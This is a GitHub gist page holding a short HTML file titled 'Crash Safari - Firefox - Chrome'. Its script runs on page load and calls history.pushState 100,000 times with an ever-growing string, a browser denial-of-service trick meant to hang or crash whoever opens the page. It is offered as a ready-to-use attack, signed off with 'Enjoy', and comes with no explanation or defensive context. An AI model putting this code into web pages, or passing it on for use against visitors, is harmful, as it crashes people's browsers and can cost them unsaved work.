Skip to content

Instantly share code, notes, and snippets.

@Saleh7
Created January 26, 2016 15:13
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Saleh7/3c2f5aff95d32af4bed9 to your computer and use it in GitHub Desktop.
Save Saleh7/3c2f5aff95d32af4bed9 to your computer and use it in GitHub Desktop.
<!DOCTYPE html>
<html>
<!-- https://github.com/Saleh7 -->
<body>
<h1>Crash Safari - Firefox - Chrome</h1>
<script>
var total = "";
for( var i = 0; i < 100000; i++ ) {
total = total + i.toString();
history.pushState(0,0, total );
}
</script>
</body>
<!-- Enjoy -->
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment